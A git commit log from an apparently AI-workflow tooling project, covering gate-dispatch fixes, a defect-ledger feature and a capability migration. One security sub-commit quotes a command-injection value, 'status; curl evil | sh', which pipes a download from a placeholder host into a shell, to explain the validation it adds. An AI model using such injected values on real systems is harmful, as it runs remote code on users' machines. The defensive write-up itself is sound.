fba3b9c24f fix(#3559): dispatch every ship:pre capability gate, not two hardcoded capIds (#3608)
* test(3559): failing-first coverage for generic ship:pre gate dispatch

ship.md's preflight resolves every active ship:pre gate then enforces exactly two
hardcoded capability IDs, so a third-party capability's blocking gate is resolved,
evaluable, and silently dropped. These tests fail on that dispatch dead-end and
pin the generic evaluator contract the fix will drive.

* fix(3559): dispatch every ship:pre gate generically, not two hardcoded capIds

ship.md's preflight resolved every active ship:pre gate via render-hooks and then
enforced exactly two capability IDs — security and broken-windows. Every other
capId, including any third-party capability's blocking gate, was resolved,
evaluable, and silently dropped: a phase shipped past its own declared failing
gate with nothing evaluated and nothing warned.

Preflight now iterates every active kind=="gate" entry in array order, dispatching
by check shape through the generic evaluator (gsd_run check predicate, ADR-2008)
and honoring each gate's own blocking and onError — the contract execute:wave:post,
execute:post and plan:post already implement and references/loop-hook-dispatch.md
already specifies. docs/how-to/command-exit-zero-gate.md already documented ship:pre
as auto-dispatching, so this restores documented behavior rather than changing it.

security and broken-windows are retained verbatim as named specializations INSIDE
the loop, so their bespoke fail-closed reads are unchanged and every gate is visited
exactly once — no double-enforcement is representable.

Also corrects two CONTEXT.md predicates that described the hardcoded shape, and the
test file's header note claiming ship:pre has no runnable evaluator (stale since #2008).

* fix(3559): validate third-party gate checks in-context before any shell use

Adversarial + security review of the generic dispatch arm this PR introduces.

SECURITY (introduced by this PR): the new every-other-capId arm is the first path
on which a THIRD-PARTY capability manifest string reaches a shell at ship:pre —
before it, dispatch never left the two first-party arms. gates[].check is not one
of the four executable surfaces the install consent prompt discloses (hooks,
command modules, mcpServers, reviewer lanes), so a capability can be consented to
as declarative-only and still reach a shell here. An unvalidated check.query of
'status; curl evil | sh' would be interpolated straight into a command
substitution. The arm now carries the same in-context validation contract
loop-hook-dispatch.md already mandates for ref.command, and the predicate arm is
specified as a single argv element so an apostrophe cannot close the literal.

TESTS: the first-cut regression tests only asserted that the shared loop phrase and
the evaluator substrings co-occurred. A partial regression that kept the phrase but
deleted the default arm would have passed them. Added a structural assertion that a
distinguishable catch-all arm exists, comes after every named branch, and is where
the generic evaluator is actually invoked.

REFERENCE DRIFT: loop-hook-dispatch.md documented onError as skip/'fail', but the
generated registry, all 35 manifest declarations, and all four dispatch sites use
skip/halt — 'fail' appears nowhere. Corrected, since this PR newly cites that doc
as ship.md's authority.

Also notes the named-query arg convention's provenance (mirrors verify:pre verbatim;
no capability declares a ship:pre query gate today).

* fix(3559): close the same gate-check injection at all four sibling dispatch sites

Maintainer directed fixing the sibling sites inline rather than filing them.

The command-injection surface fixed at ship:pre is a FAMILY property, not a site
property: every workflow that interpolates a manifest-supplied check.query into a
shell command substitution has it. Root cause is in the contract, not the sites —
references/loop-hook-dispatch.md mandates in-context validation for step ->
ref.command and OMITS the same requirement for gate, so all four gate consumers
inherited an unstated rule.

Closed at the source (the reference's gate section now carries the rule) and at
every consumer:
  execute-phase.md  execute:wave:post, execute:post
  plan-phase.md     plan:post
  verify-work.md    verify:pre
  ship.md           ship:pre  (already hardened in a2d84a77)

TESTS: section 6 enumerates the family by DISCOVERY, not by a hardcoded list, so a
new dispatch site added later without the validation contract fails instead of
shipping — the same 'hardcoded list silently misses members' mistake #3559 itself
was. It asserts, per discovered site, that the charset is pinned, that validation is
specified as in-context, and that the rule appears BEFORE the interpolation it
guards (an executing agent reads top-down). A floor assertion fails the section if
the discovery regex ever stops matching, so it cannot pass vacuously. Two further
tests pin the reference's gate section and the halt/skip onError vocabulary.

Sizes all within tier caps: execute-phase 94378/98304, plan-phase 91008/98304,
verify-work 39488/61440, ship 38067/40960. Drift acks amended for each.

* fix(3559): fit the validation mandate under the frozen pre-phase-6 ceiling

The previous commit blew tests/claude-orchestration.test.cjs's frozen ADR-857
pre-phase-6 ceiling for execute-phase.md (93600): the file had only 209 bytes of
headroom and the inline validation paragraph added 987. That ceiling is a ratchet
proving Phase 6 extraction happened — raising it is never the answer.

Restructured so the RULE lives once, in the reference's gate section (charset,
in-context, single-argv, and the consent-surface rationale), and each of the five
dispatch sites carries a terse mandate plus a pointer to it. That is strictly better
than five verbatim restatements: this PR exists partly because the reference and its
implementations had already drifted apart on the onError vocabulary, and five copies
of a security rule is that same failure waiting to recur. execute-phase.md already
eagerly inlines the reference (@-form at its step-hook dispatch), so an executing
agent has the full rule in context regardless.

Also reclaimed genuinely duplicated bytes at the execute:post site, whose prose
restated both commands the fenced block immediately below already shows, and whose
tail restated the two-step contract that the execute:wave:post site spells out in
full.

Net sizes vs origin/next:
  execute-phase.md  93365  (-26, SHRINKS)  pre-phase-6 93600, margin 235 (was 209)

Because execute-phase.md now shrinks, its drift-ack entry was reverted — an ack that
is never consumed is reported as STALE and fails the check. The other three acks
carry corrected byte figures.

Tests follow the same split: section 6 asserts the mandate + pointer per discovered
site and the full rule in the reference; section 5's security test drops the inline
charset assertion it can no longer make of ship.md.

* fix(3559): repair an over-escaped regex in the security assertion

/loop-hook-dispatch\\.md/ matched a literal backslash before .md, so it could never
match and the [security] assertion failed on the remote runner even though the prose
it checks was correct. The over-escaping came from nesting a regex through a shell
string into a node -e script; the sibling literal in section 6, written via a quoted
heredoc, was unaffected.

The reason this reached the runner at all is that the local check re-typed the regex
by hand instead of executing the one in the file, so it validated a different pattern
than the test used. Replaced that habit with two harnesses that read the literals FROM
the source: one asserts every regex literal in the file matches something in the real
workflow/reference corpus (catching over-escaping generically), the other evaluates
the [security] and section-6 literals against their actual targets.

* feat(#1950): broken-windows ledger — cross-phase defect register gating ship

Adds a new  capability (#1950) that operationalizes GSD's
no-defer discipline as a tracked, enforced artifact:
accumulates stubs, TODOs, skipped tests, unrun verifies, and unmet truths
across phases, and /gsd-ship blocks while any entry is open.

Implementation:
- src/broken-windows.cts → gsd-core/bin/lib/broken-windows.cjs: typed IR +
  I/O entry points (parseLedger/renderLedger/appendWindow/markWaived/markFixed
  + cmdWindowsStatus/Append/Waive/MarkFixed). Frozen REASON enum for typed
  error assertions. Windows-safe atomic rename with retry on transient
  EPERM/EBUSY/EACCES.
- gsd-tools.cjs: new  subcommand (status | append | waive | fixed),
  wired via routeWindows + HOST_COMMAND_ROUTERS.windows.
- capabilities/broken-windows/capability.json: one ship:pre gate with
  artifact-frontmatter-equals predicate on WINDOWS.md open_count == 0.
  activationKey windows.enabled (default true) + sibling windows.enforce
  (default true, separate so tracking can precede enforcement).
- gsd-core/workflows/ship.md: capId==broken-windows branch in preflight,
  sibling to security — reads gsd_run windows status --raw, fails closed
  on open_count > 0 or unreadable ledger.
- agents/gsd-executor.md: extends the existing ## Known Stubs instruction
  to also append to WINDOWS.md via gsd_run windows append (best-effort,
  never blocks execution).
- agents/gsd-verifier.md: new Step 8b — record unmet truths + human-verify
  items in WINDOWS.md.
- gsd-core/workflows/progress.md: surfaces open + waived counts.
- docs/COMMANDS.md + CONTEXT.md glossary entry + docs/INVENTORY.md:
  document the gate, waiver mechanism, and new module.
- tests/broken-windows.test.cjs: pure + CLI behavioral coverage + fast-check
  roundtrip property; fail-closed on malformed ledger; security boundary on
  path traversal in --file.

Backward-compatible: a project with no .planning/WINDOWS.md reports
open_count: 0 and ships cleanly. Disable enforcement per-project with
gsd config-set windows.enforce false (tracking continues, gate stays open).

* chore(#1950): ratchet size baselines, defer verifier integration

- Workflow size baseline: ship.md 25575→27928, progress.md 31789→32632
  (broken-windows preflight branch + open-windows surface).
- Agent size baseline: gsd-executor.md 46644→47951 (Known Stubs → also
  appends to WINDOWS.md). gsd-verifier.md unchanged.
- LARGE_CAP (49152) preempted the planned verifier integration
  (gsd-verifier.md was at 49140 pre-PR — 12 bytes of headroom, not the
  documented 'real headroom'). Verifier integration deferred to a follow-up
  PR that extracts the VERIFICATION.md template (lines 739-859) to
  gsd-core/references/ — a pre-existing cap-tightness defect this PR
  exposed but does not expand scope to fix. Verifier integration is not in
  the issue's acceptance criteria (executor writes is; unmet-truths
  recording was an enhancement, not a gate).

* fix(#1950): gate default-off, rename to workflow.windows_enforce, regen goldens

Test-failure-driven fixes after first gsd-test run on db8733c8f failed 44
cases (pre-existing structural tests encoded 'ship:pre has 1 gate' / 'all
caps off → empty hooks'):

- capability manifest: rename windows.enabled+windows.enforce (default
  true) → single federated key workflow.windows_enforce (default FALSE,
  opt-in). Matches security's workflow.security_enforce convention and
  makes the adr857 all-caps-off test pass without modification (the test's
  buildAllFalseConfig handles workflow.* out of the box). Default-OFF keeps
  the gate out of the registry's default ship:pre resolution so existing
  loop-hooks-ship-pre-e2e structural assertions (exactly 1 gate, capId
  'security') stay valid; users opt in via
  gsd config-set workflow.windows_enforce true.
- drop activationKey (security doesn't have one either; workflow.* key
  doubles as the activation toggle).
- regenerate docs/reference/capability-matrix.md to include broken-windows
  (capability-matrix-sync test).
- regenerate tests/fixtures/golden-install-parity/*.json (18 runtimes) —
  installer now emits the new capability + lib file.
- update CONTEXT.md, docs/COMMANDS.md, docs/FEATURES.md, ship.md,
  agents/gsd-executor.md to use the new key name and /gsd:colon slash
  syntax (slash-command-namespace test).
- restore accidentally-regressed /gsd:capture in progress.md.

Tracking-only by default; enforcement is opt-in. Acceptance criterion
'/gsd-ship fails while any ledger entry is open' is met when
workflow.windows_enforce=true (test fixture enables it).

* test(#1950): update ship:pre structural invariants for 2-gate registry

- loop-hooks-ship-pre-e2e: the registry now declares 2 gates at ship:pre
  (security + broken-windows), regardless of activation. Activation tests
  above still pin security-only or empty behavior via fixtures; these
  structural tests pin the REGISTRY shape, which has 2 gates as of #1950.
- workflow-size-baseline: ship.md 27928→27945 (workflow.windows_enforce
  rename added 17 bytes).

* fix(#1950): review H1+H2+M1+M2+M3 — fence-injection, EACCES fail-closed, cleanup, strict line, stryker

Adversarial isolated review (Step 6.3) found 2 HIGH findings that block
the PR and 3 mediums. All addressed:

H1 (HIGH): description containing the markdown 3-backtick fence would
terminate the ledger's JSON code block early inside JSON.stringify output
(JSON doesn't escape backticks), corrupting the file and bricking the
next parse. Fix: use a 4-backtick fence (json ... ) which
JSON.stringify cannot produce on its own, AND validate that no entry
text field contains a 4-backtick run (reject at append time with new
WINDOWS_INVALID_TEXT reason code). Locked by a regression test.

H2 (HIGH): readLedgerOrNull swallowed ALL fs errors as 'no ledger',
silently returning open_count:0 on EACCES/EPERM/EIO. The ship gate
would then pass on an unreadable ledger — the precise vector the
workflow doc claims is impossible. Fix: only ENOENT returns null;
every other fs error propagates as WINDOWS_LEDGER_MALFORMED so the
gate blocks and the operator sees a real diagnostic. Locked by a
regression test that chmod 000s a ledger with open_count=1 and
asserts the result is never a false-green 0.

M1: writeLedgerAtomic left an orphaned .tmp file on rename failure.
Wrapped renameWithRetry in try/catch with best-effort unlink.

M2: validateLine silently coerced 'abc' → NaN → null, hiding type
drift. Removed the line === 0 special case (was undocumented) and
made the error message match the strict check. Now any non-positive-
integer line value throws, including strings.

M3: tests/broken-windows.test.cjs (with its fast-check property test)
was not in stryker.config.mjs DEFAULT_TEST_CMD — Stryker would mutate
src/broken-windows.cts but no test would catch the mutations,
producing false surviving-mutant scores. Added to the list.

L1 (dead throw e after error()), L7 (line boundary tests, H1/H2
regression tests, 4-backtick CLI test) also addressed.

* docs(#1950): inline concurrency + busy-wait notes (review L2+L3)

* fix(#1950): regen goldens against latest gsd-tools; correct --line 0 boundary test

gsd-test v4 caught two issues:
- goldens I regenerated earlier (commit 526682084) predated the L1
  routeWindows catch-block cleanup (commit dd844d565). Regenerated
  via 'npm run gen:golden' against current HEAD so the install
  parity hash for gsd-tools.cjs matches.
- 'append --line boundary' test expected --line 0 to succeed with
  null entry.line, but the M2 fix correctly rejects 0 (lines are
  1-indexed; 0 is not a valid source line). Updated the boundary
  test to assert --line 0 fails alongside -1 and 'abc'.

* chore(#1950): regen goldens after rebase onto next

* chore(#1950): quick.md baseline 50699→50993 (correct resolution from next rebase)

* chore(changeset): backfill pr:2441 in .changeset/broken-windows-ledger.md

* fix(#1950): renderTable escapes backslash before pipe (CodeQL incomplete-sanitization)

CodeQL flagged the markdown-table cell escaper:
  String(s ?? '').replace(/\|/g, '\\|')
— it escapes pipe but not backslash first. A description containing '\|'
would render as '\\|' which markdown parses as 'literal backslash' +
'cell separator', splitting the column.

Fix: escape backslash FIRST (each \ → \\), then pipe (each | → \|).
Now a description with '\|' renders as '\\\\|' (literal '\\' + escaped
pipe), which markdown renders as a single '\|' inside the cell. The JSON
code block (the parse source-of-truth) was already correctly escaped via
JSON.stringify; only the display-only table was affected.

Locked by a regression test that:
1. Verifies the JSON block reparses with the description intact.
2. Walks the rendered table row counting unescaped pipes — must be
   exactly 11 (the row separators for 10 cells), proving no in-cell
   pipe added a split.

b10e56818b feat(#1169): complete ADR-857 phase 6 — migrate features to Capabilities, revive dead gates, harden conformance gate (#1183)
* test(#1168): make phase-6 gate un-gameable — reject empty stubs + require loop shrink

The migration assertion previously checked only role==feature, so a registration-only stub (empty hooks, logic left inline) would turn the gate green while phase 6 stayed incomplete — the exact false-completion pattern this gate exists to prevent. Strengthen it: each ADR-named feature must OWN its behavior (>=1 hook, or a command family); and plan-phase.md/execute-phase.md must shrink strictly below their frozen pre-phase-6 sizes (94519/93166 LF bytes), which also defeats double-run gaming (declare a hook but keep the inline block -> file does not shrink -> red).

Gate now 5 pass / 4 fail (orphaned execute:wave:post, empty/unregistered features, config-key leaks, no shrink). Green is now reachable only by REAL migration. Refs #1168, #1169.

First real ADR-857 phase-6 migration (pattern-defining tracer). gap-analysis moves from an inline post_planning_gaps branch in plan-phase.md to a real plan:post gate Capability:

- capabilities/gap-analysis/capability.json: role:feature, plan:post gate (when=workflow.post_planning_gaps, blocking:false advisory), OWNS workflow.post_planning_gaps (federated out of central schema). - plan-phase.md: inline config-get + gsd_run gap-analysis block replaced with a plan:post render-hooks call site dispatching the gate; file shrinks 94519->93279. - src/check-command-router.cts: cmdGapAnalysisPlanPost runs the real gap analysis via gap-checker. - post_planning_gaps removed from central manifest; resolves via federated config (default true preserved). - tests/post-planning-gaps-2493: re-pointed to assert capability ownership.

Verified: gate 5 pass / 4 fail (gap-analysis cleared from migration, plan:post-orphan, config-leak, and plan-phase shrink checks); loadConfig still returns post_planning_gaps=true; check command runs real analysis; 392/392 in the config/registry/federation/router net. Refs #1169.

ADR-857 Decision 7: profile-pipeline becomes a command-family Capability (like audit/intel/graphify). capabilities/profile-pipeline/capability.json declares an 8-command family (scan-sessions, extract-messages, profile-sample, write-profile, profile-questionnaire, generate-dev-preferences, generate-claude-profile, generate-claude-md) backed by a new gsd-core/bin/lib/profile-pipeline-command-router.cjs; the inline case arms are removed from gsd-tools.cjs. Owns profile-pipeline.enabled (federated).

Verified: registry shows role:feature with commands.length=8; scan-sessions/profile-sample run live via the family; gate cleared profile-pipeline from the empty-stub failure (only tdd/schema-gate/drift remain); 296/296 registry+inventory+gsd-tools tests; lint 0 errors. Refs #1169.

Revives the second dead gate from #1167: ui.gates@execute:wave:post was declared but never dispatched AND its check.query (ui.safety-gate) was unimplemented. Adds the per-wave execute:wave:post render-hooks call site in execute-phase.md (fires after each wave's merge/cleanup, before the next forks) and implements cmdUiSafetyGate (frontend + UI-SPEC aware, mirrors cmdUiPlanGate) in check-command-router. +17 regression tests.

Verified: phase-6 orphaned-points conformance test now PASSES (gate 6 pass / 3 fail); ui-safety-gate routable in dot+hyphen forms; check-ui-safety-gate 17/17, check-ui-plan-gate 18/18; lint 0 errors. Refs #1167, #1168.

Removes the inline schema_drift_gate + codebase_drift_gate steps (77 lines) from execute-phase.md; drift becomes a Capability with two execute:wave:post gates (verify.schema-drift blocking, verify.codebase-drift advisory) dispatched via the per-wave render-hooks call site. check-command-router routes verify.schema-drift / verify.codebase-drift to the real detectors. Federates workflow.drift_threshold / drift_action / schema_drift_gate out of central.

Also fixes the execute:wave:post dispatch prose to run NON-blocking (advisory) gates too — the prior version only ran blocking gates, which would have silently dropped the codebase-drift advisory after its inline step was removed. Behavior preserved.

Verified: gate 7 pass / 2 fail (drift cleared from stub + config-leak; execute-phase.md 92297 < 93166 frozen -> shrink passes); both drift checks run real detection; loadConfig defaults preserved (threshold=3, action=warn, gate=true); drift-detection 56/56 + schema-drift 34/34; lint 0 errors. tdd becomes a real Capability: a plan:pre contribution injects the <tdd_mode_active> planner guidance (rendered from PLAN_PRE_HOOKS_JSON like security's contribution), and an execute:post gate (tdd.review-checkpoint, advisory) runs the real end-of-phase RED/GREEN review via a new check-command handler. Inline tdd_mode reads + the inline planner block + the tdd_review_checkpoint step are removed; workflow.tdd_mode is federated out of central. The MVP+TDD per-task RED-commit gate is preserved — TDD_MODE is now derived from the execute:post hooks (capId==tdd active), not an inline config-get.

BEHAVIOR CHANGE (documented, not silent): the --tdd CLI flag now persists workflow.tdd_mode=true via config-set instead of being per-invocation. Rationale: tdd is now a config-toggled Capability, and env vars do not persist across the workflow's separate bash blocks (config does), so an ephemeral override isn't cleanly achievable; --tdd therefore enables the tdd capability, consistent with how all capabilities are toggled.

Verified: gate 7 pass / 2 fail (tdd cleared from stub + config-leak; plan-phase + execute-phase both < frozen sizes); contribution injection + execute:post gate dispatch wired; MVP+TDD gate preserved; tdd.review-checkpoint runs real review; full unit suite 556/0; lint 0 errors. Refs #1169.

The plan-time schema-push detection (former plan-phase.md §5.7) becomes a schema-gate Capability: a plan:pre contribution (into:planner, when:workflow.schema_push_detection) whose fragment carries the full ORM-detection + [BLOCKING] schema-push-task injection logic, rendered into the planner via the existing plan:pre render-hooks dispatch. The inline §5.7 block is removed (plan-phase.md 94519->90445). workflow.schema_push_detection is a new capability-owned (federated) key, default true. (The execute-side schema-drift gate was migrated separately into the drift capability.)

Verified: registry inlines the fragment (len 2704) so it is actually delivered at plan:pre; gate 8 pass / 1 fail — all 5 ADR-named features now real Capabilities, only the config-leak test remains (intel/security, next unit). Refs #1169.

Removes the last inline config-get reads of capability-owned keys from plan-phase.md. security_asvs_level/security_block_on now flow through the security plan:pre contribution via a new loop-resolver configValues mechanism (resolves declared config keys with the same 4-level precedence as activation and attaches them to the rendered hook); the §5.55 banner reads them from PLAN_PRE_HOOKS_JSON. intel.enabled becomes a real intel plan:pre step (ref.command: intel api-surface) dispatched via render-hooks; the inline intel branch is gone. gen-capability-registry now validates ref.command as a third dispatch shape.

Verified: phase-6 capstone conformance gate is FULLY GREEN (9/0); 3 leaks gone (grep=0); security configValues resolve to {2,medium}/default {1,high}; intel step present only when enabled; loop-render-hooks 62/0, capability-registry 287/0, capability-state/federated-config 113/0; lint 0 errors. Closes the migration half of #1169. Refs #1139, #1167, #1168.

Adversarial review caught 2 real regressions the green gate missed: (1) schema-drift no longer blocked — the execute:wave:post dispatch read GATE_RESULT.block but verify.schema-drift emitted drift_detected/blocking, and onError:skip wrongly bypassed positive blocks; (2) only tdd's plan:pre contribution was injected into the planner, dropping schema-gate's schema-push detection and security's threat-model guidance.

Fixes: (A) every gate check returns a uniform boolean 'block' under --raw (the dispatch form), with advisory gates (tdd/gap) carrying their report in 'message'; (B) gate-dispatch contract corrected at all sites — onError governs command errors only, a blocking gate's positive block always halts; (C) generic planner injection of all plan:pre contributions where into=='planner' (tdd + schema-gate + security incl configValues); (D) two new conformance assertions: planner contributions injected generically + every gate check.query returns boolean block under --raw.

Verified: gate 11/11; all 6 gate checks return boolean block under --raw; full suite 595/0; lint 0 errors. Refs #1167, #1168, #1169.

The migration prose had downgraded this to a 'strong advisory recommendation' — silent loss of the blocking escalation. Restore it: the tdd-gate dispatch now refuses to mark the phase complete (Phase blocked message) under MVP+TDD when GATE_RESULT.block is true; advisory otherwise.

Also strengthen tests/execute-mvp-tdd-gate.test.cjs: hasBlockingEscalation previously matched any line with 'blocking'+'mvp+tdd' (so 'advisory (blocking: false) ... under MVP+TDD' was a false green); now it requires the real refusal semantics ('refuse to mark the phase complete' / 'phase blocked'). Caught by 2nd adversarial review pass.

Verified: execute-phase.md 92702 < 93166 frozen; mvp-tdd-gate + phase-6 gate 19/0; full suite green; lint 0 errors. Refs #1169.

- execute-phase.md lost its AskUserQuestion TEXT_MODE plain-text fallback when
  the inline schema_drift_gate step was removed — non-Claude runtimes would
  stall. Restored, and the execute:post gate-dispatch prose de-duplicated to
  cite the execute:wave:post contract (loop body shrinks below the frozen
  pre-phase-6 ceiling while keeping every onError/blocking nuance).
- capabilities/tdd inline fragment hardcoded `@~/.claude/gsd-core/references/tdd.md`,
  baked verbatim into the committed capability-registry.cjs and leaked the
  install path on 11 non-Claude runtimes (registry .cjs is copied, not
  path-converted). Made the fragment path-free; regenerated the registry. The
  phase-6 conformance gate now guards this (no ~/.claude install path in any
  capability source or the generated registry).
- plan-phase.md: removed a §5.7 stub re-added in error and routed Branch 2 to
  step 6 (schema-gate is a plan:pre capability, §5.7 is gone).

Stale workflow-contract tests re-pointed to the capability dispatch they now
must assert (behavior verified preserved in source first, assertions kept
equal-or-stronger): bug-621 + bug-2851 (gap-analysis via gsd_run render-hooks
plan:post + registry binding), feat-2527 (tdd_mode federated out of central),
phase6-planning + plan-phase-ui-redirect (§5.6 bounded by ## 6.),
plan-phase-drift-guard (intel when:intel.enabled skip branch).

profile-pipeline-command-router.cjs un-ignored from eslint (hand-written, no
TS source) + stale disable comments removed. Size baseline regenerated.

Verified: full suite 15140 tests / 0 fail; lint 0 errors; conformance gate green

`claudeToCopilotTools`). Deleted the dead duplicates; install.js's live copies
are untouched (it never imported these). Lint now 0 errors / 0 warnings.

Adversarial-review (Codex) findings fixed:
- HIGH: execute-phase.md TDD_MODE used `jq ... || echo false`, silently
  disabling the MVP+TDD blocking gate on jq-less runtimes. Reverted to the
  `node -e` form (node is guaranteed; matches the file's other node-e usages) so
  a missing optional tool can no longer fail-open a blocking safety path.
- MEDIUM: federated-config-key-removal orphan-key test was vacuous (it skipped
  the orphan assertion). Now asserts the removed capability's key is genuinely
  not surfaced/validated after uninstall.
- LOW: phase-6 conformance leak regex broadened to catch absolute-home and
  Windows-backslash `.claude/(gsd-core|commands|agents|hooks)` paths, not only
  `~`/`$HOME` forward-slash forms.
- LOW: bug-2851 plan:post dispatch assertion now requires `--raw` (matched its
  stated contract).
- nit: plan-pre intel-step test duplicate assertion replaced with a distinct
  structured-output check.

Size baseline regenerated (execute-phase.md 93089 < 93166 frozen). Refs #1167, #1169.

(`os.homedir()`-derived) directly in each `test(...)` title, so titles differed

test PASSES on both platforms (15885/0 leaf tests each), but gsd-test-summary
compares results by title and reported 29+29 false "only in Mac / only in
Docker" discrepancies for tests that actually pass everywhere.

Move the golden path out of the title and into the assertion message (still
shown on failure); titles are now byte-identical across platforms so the
cross-platform comparator matches them. No assertion logic or golden values

workflow markdown (inline code-exec = injection vector), turning the security
gate red. Both forms were wrong: node -e fails the scanner; jq fail-opens a
blocking safety gate; `config-get workflow.tdd_mode` is forbidden by the
conformance leak gate (tdd_mode is capability-owned).

Correct fix (what Codex recommended): a gsd_run-native boolean. Add an
`--active-cap <capId>` flag to `loop render-hooks <point>` that resolves hooks
the normal way and prints exactly `true`/`false` for whether a capId is active
— scanner-safe (canonical launcher, no inline code), node-reliable (no optional
jq to fail-open), and leak-free (render-hooks resolution, not config-get).
execute-phase.md:181 now `TDD_MODE=$(gsd_run loop render-hooks execute:post
--active-cap tdd)`. +5 behavioral tests for the flag.

Verified: prompt-injection-scan --diff origin/next → 0 findings; conformance
gate 13/13 (execute-phase.md 92934 < 93166); execute-mvp-tdd + tdd-mode +
loop-render-hooks 87/0; lint 0/0. Refs #1167, #1169.
